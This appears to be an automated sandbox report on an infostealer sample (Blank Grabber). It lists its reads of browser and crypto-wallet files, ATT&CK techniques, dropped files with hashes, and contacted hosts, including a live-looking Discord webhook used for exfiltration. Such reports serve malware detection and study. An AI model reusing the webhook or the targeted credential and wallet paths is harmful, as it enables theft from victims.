Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: Yara match

File source: 00000005.00000002.2085800430.000002B9B9480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000005.00000003.1724535496.000002B9B96E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1710226799.0000021148F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1710226799.0000021148F02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2085800430.000002B9B9480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2084370942.000002B9B713F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2086197806.000002B9B98BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2086727493.000002B9B99E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2081920578.000002B9BA2AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI54322\rarreg.key, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 5_2_00007FFDF10C2B5D bind,WSAGetLastError,

5_2_00007FFDF10C2B5D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	141 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 File and Directory Permissions Modification	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	11 Windows Service	11 Windows Service	4 Disable or Modify Tools	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	222 Command and Scripting Interpreter	Logon Script (Windows)	112 Process Injection	11 Deobfuscate/Decode Files or Information	Security Account Manager	247 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Service Execution	Login Hook	Login Hook	31 Obfuscated Files or Information	NTDS	891 Security Software Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	Network Logon Script	121 Software Packing	LSA Secrets	3 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	371 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Masquerading	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Modify Registry	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	371 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	112 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
47SXvEQ.exe	21%	ReversingLabs	Win32.Trojan.Generic
47SXvEQ.exe	100%	Avira	TR/Crypt.TPM.Gen
47SXvEQ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI54322\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\libffi-7.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\libssl-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\python310.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI54322\unicodedata.pyd	0%	ReversingLabs
C:\Windows\Temp\qnibnfgnagzt.sys	5%	ReversingLabs

Name	IP	Active	Malicious	Reputation
discord.com	162.159.135.232	true	false	high
ip-api.com	208.95.112.1	true	false	high
blank-16pis.in	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Reputation
https://discord.com/api/webhooks/1319333831601422477/Gz1lBx-zJ-f6c5VmTw7-Emfjq_tqsL0pI1D5turBQtQOU8FjLlkxesj3qj89-C61Kjse	false	high
http://ip-api.com/json/?fields=225545	false	high
http://ip-api.com/line/?fields=hosting	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	false	high
https://sectigo.com/CPS0	Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	false	high
http://crl.thawte.com/ThawteTimestampingCA.crl0	Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	false	high
http://ocsp.sectigo.com0	Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	false	high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	false	high
http://ocsp.thawte.com0	Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
162.159.135.232	discord.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585573
Start date and time:	2025-01-07 21:00:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	126
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	47SXvEQ.exe
Detection:	MAL
Classification:	mal100.rans.troj.adwa.spyw.expl.evad.mine.winEXE@207/55@4/2
EGA Information:	Successful, ratio: 28.6%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 216.58.206.35, 52.149.20.212, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, otelrules.azureedge.net, gstatic.com, ctldl.windowsupdate.com, pool.hashvault.pro, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 47SXvEQ.exe, PID 6956 because it is empty
Execution Graph export aborted for target instals.exe, PID 3716 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2944 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7092 because it is empty
Execution Graph export aborted for target svchost.exe, PID 6024 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 47SXvEQ.exe

Simulations

Behavior and APIs

Time	Type	Description
15:01:03	API Interceptor	1x Sleep call for process: instals.exe modified
15:01:05	API Interceptor	146x Sleep call for process: powershell.exe modified
15:01:07	API Interceptor	4x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	test.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	ip-api.com/json/
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	ip-api.com/line/?fields=hosting
	1.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=hosting,query
	1.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=hosting,query
	YPzNsfg4nR.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	SAL987656700.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Resource.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	P3A946MOFP.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	BootstrapperV1.16.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	SharkHack.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
162.159.135.232	S23UhdW5DH.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc	Browse	discord.com/admin.php
162.159.135.232	18561381.exe	Get hash	malicious	RedLine	Browse	discord.com/channels/948610961449816084/948610961449816086/948611091527774228

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discord.com	P3A946MOFP.exe	Get hash	malicious	XWorm	Browse	162.159.128.233
	paint.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	hkMUtKbCqV.exe	Get hash	malicious	Unknown	Browse	162.159.137.232
	X9g8L63QGs.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	KpHYfxnJs6.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	9g9LZNE4bH.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	riFSkYVMKB.exe	Get hash	malicious	Blank Grabber	Browse	162.159.138.232
	AimStar.exe	Get hash	malicious	Blank Grabber	Browse	162.159.128.233
	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	162.159.137.232
	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.138.232
ip-api.com	test.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	208.95.112.1
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	208.95.112.1
	1.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	1.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	YPzNsfg4nR.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	SAL987656700.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Resource.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	P3A946MOFP.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	BootstrapperV1.16.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	SharkHack.exe	Get hash	malicious	XWorm	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	QoRXFaE8Xn.exe	Get hash	malicious	DCRat	Browse	188.114.96.3
	https://pozaweclip.upnana.com/	Get hash	malicious	Unknown	Browse	104.18.11.207
	https://us01-i-prod-estimating-storage.s3.amazonaws.com/598134325679181/562949954787293/Documents/1706942/Hoosier%20Crane%20Service%20Company.pdf	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	https://link.edgepilot.com/s/692fcd16/rcPy0yXyykq_mRLKroUvRQ?u=https://petroleumalliance.us8.list-manage.com/track/click?u=325f73d29a0b4f85a46b700a9%26id=dfe369da82%26e=94c2db4428	Get hash	malicious	Unknown	Browse	104.17.223.152
	http://xyft.zmdusdxj.ru	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29t	Get hash	malicious	Unknown	Browse	104.17.25.14
	Globalfoundries eCHECK- Payment Advice.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	01-06-2025 Docu.invpd (1).pdf	Get hash	malicious	HTMLPhisher	Browse	172.67.179.163
	https://creditunions.taplink.ws	Get hash	malicious	HTMLPhisher	Browse	172.67.74.23
TUT-ASUS	test.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	208.95.112.1
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	208.95.112.1
	1.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	1.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	YPzNsfg4nR.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	SAL987656700.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Resource.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	P3A946MOFP.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	BootstrapperV1.16.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	SharkHack.exe	Get hash	malicious	XWorm	Browse	208.95.112.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\_MEI54322\VCRUNTIME140.dll	LEmcGUQfA7.exe	Get hash	malicious	Python Stealer, Creal Stealer	Browse
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	Fi3ptS6O8D.exe	Get hash	malicious	Amadey	Browse
	test.exe	Get hash	malicious	Unknown	Browse
	random(4).exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	V2s8yjvIJw.exe	Get hash	malicious	Iris Stealer	Browse
	1A70mZfanW.exe	Get hash	malicious	Unknown	Browse
	Ei5hvT55El.exe	Get hash	malicious	Unknown	Browse
	roblox1.exe	Get hash	malicious	Python Stealer, Monster Stealer	Browse
	roblox.exe	Get hash	malicious	Python Stealer, Monster Stealer	Browse

Created / dropped Files

C:\ProgramData\Microsoft\svchost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\instals.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5264896
Entropy (8bit):	6.524291250916726
Encrypted:	false
SSDEEP:	98304:GpARPdrGXjhDyjAFUS2JqhqqGFMiKTzHPO4KYL8351+Zm+Dw3a5:GpMNGXJsOd2JqhqqLTrPO4/o351+ZzDF
MD5:	C289921058A4B38BDBD1373A0CBB757D
SHA1:	A70B63234511AFA4176A56AFA2FF5FEBED68E7E5
SHA-256:	DBC71B99B03CBE4B779F17DB23017E22EC6CC8D85BCDAC55FB75B8412CD2B8D0
SHA-512:	8092C0BC272799D7D08294EFC8D9AC08F3F05B7D3335E2426596A6D3AD0E0D89BBE45931CD267BA22CE49FF5A435443498D4DEB2F119075E76EE5492DAE4511C
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....t}g.........."...........O.....@..........@..............................P...........`.....................................................<.............P...............P.x...............................(.......8...............x............................text............................... ..`.rdata...=.......>..................@..@.data...(.O......ZO.................@....pdata........P......NP.............@..@.00cfg........P......PP.............@..@.tls..........P......RP.............@....reloc..x.....P......TP.............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\ ?? ? \Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	692489
Entropy (8bit):	7.923256771798863
Encrypted:	false
SSDEEP:	12288:2U9YNlrsDAL0YlKCsI4jx/NmRnuMYt2lH1gwB2+eQRwWflPRUVuf:2f7r6AL0cP3WlU3YtcqY2GzUEf
MD5:	3F6F19D40331E11A67D7B563DF0EE369
SHA1:	E8DDDCE016DF2DFBBA3808546E500CF4E2CB4B59
SHA-256:	B8D363012D0EF260558EEE1E68FD3A3173761A4E257347580891C6C7E4987E90
SHA-512:	4A2B1FB18DDF5DF84E8B9083C91CE6AA38C3F5BD8EB192B9DFD33046986EE05305CBCEBC6109F20C5A0AA76FA959AD97012871F92F476FA954BE034A23AF7995
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mU....v..I.s.w..XU......X...ZQe..Rr...d.`.....lD%H.1.XGK).$.U6.$... ...c......ko.[{Z...o.c......>F.s./...l...C.;%...O{..tO..:'.{X`.t.4:.....N.y/..C....&.\|..L.?M.........Wl.h.q.~ant>..91ulL.sO...yb..Y..HL.-..H........=.#.....5...k...4.C....CfO....L...?..S.yx~9....c1U....s....[.}.j........2.1..@..i.Y..#..L}.........5.?........<.E.S........E.S.Mys.....,z.`..'.Wj..u.@..3f..wd...fj..{ ...wf....+........"c.m.N.[Z........]us....j.[n....e....93..rK...a.P..%)O0f..>7V.7'...Z..S\|Q.k.T._.w..}R<...i......h<...ml..o......j.....K.=......{]_-yS..3..b.t....v....zM.....'..M..RLcA>.=o....e.]B,...%/.;;].../J.tw....J.-!..w..Z.k.....NWe.;^...qC.l..o.{...]....;\Yu.."..vL......./..;\...........%.\.Y.s.n....c~Y..K.._.....X..;...K{n.Y.10...).].O.?..%.E.^...=..h..3e...m.[..oui5..%..t.t..b.-.n.}.>,.&.k}.^..].MZ.u...O...Ly._\-."]7..)O.g..[.m..S...w6...nvQ..lza.)W..Z..z.

C:\Users\user\AppData\Local\Temp\Built.exe

Download File

Process:	C:\Users\user\Desktop\47SXvEQ.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6259986
Entropy (8bit):	7.989746830275031
Encrypted:	false
SSDEEP:	98304:6rIu4+Dcd/amaHl3Ne4i3gDUZnhhM7M+yvFaW9cIzaF6ARwDtyDe2HBMG23kMWcZ:60p+DmieNoInY7/sHfbRy9uGOWsX9Tb
MD5:	CF6FC2AEA60B6D65DCC9C16166C8161A
SHA1:	49EE49AAB7C17B2A518C521A6C46A973E2D95789
SHA-256:	90EF4DB2ED060CA10C77DE5CAC4C09EF26C5470BBA68A943547BC4FB35256070
SHA-512:	4157A93FEFBFCB4EDE0F34427D3C3CD901D829D9412C9EFD007CC1761AF2B3B5F5BD502746944603CB1740F4F49A2C583CA4560F06A6B428C13B2EBA0648EC87
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d....w}g.........."....).....p...... ..........@......................................_...`.................................................4...x....p..P....@..8"...`_.H$......d...................................@...@............................................text...p........................... ..`.rdata..(*.......,..................@..@.data....S..........................@....pdata..8"...@...$..................@..@.rsrc...P....p......................@..@.reloc..d...........................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	894
Entropy (8bit):	3.1057723844176333
Encrypted:	false
SSDEEP:	12:Q58KRBubdpkoPAGdjrifnZk9+MlWlLehW51ICPfHI:QOaqdmOFdjrr+kWResLIJ
MD5:	05219F991576D003EF688C42B8773BCE
SHA1:	8D1B0841495D9A56E77F6731655283292DAE89B0
SHA-256:	180B3BA4B260F6B141E126A07217F642091CC852FA5774EE049D187478DF83C5
SHA-512:	3353866688737984DD5A88E15C08BBBAEC1243653FF5D4A82E0AB57C9342EF572E7060E30ED2B334357CA86C0A7DDFA01F5B57CA0953F3A2F836CB3CD7360F69
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. T.u.e. .. J.a.n. .. 0.7. .. 2.0.2.5. .1.5.:.0.1.:.1.7.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.u.e. .. J.a.n. .. 0.7. .. 2.0.2.5. .1.5.:.0.1.:.1.7.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

C:\Users\user\AppData\Local\Temp\_MEI54322\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98736
Entropy (8bit):	6.474996871326343
Encrypted:	false
SSDEEP:	1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
MD5:	F12681A472B9DD04A812E16096514974
SHA1:	6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
SHA-256:	D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
SHA-512:	7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: LEmcGUQfA7.exe, Detection: malicious, Browse Filename: ebjtOH70jl.exe, Detection: malicious, Browse Filename: Fi3ptS6O8D.exe, Detection: malicious, Browse Filename: test.exe, Detection: malicious, Browse Filename: random(4).exe, Detection: malicious, Browse Filename: V2s8yjvIJw.exe, Detection: malicious, Browse Filename: 1A70mZfanW.exe, Detection: malicious, Browse Filename: Ei5hvT55El.exe, Detection: malicious, Browse Filename: roblox1.exe, Detection: malicious, Browse Filename: roblox.exe, Detection: malicious, Browse
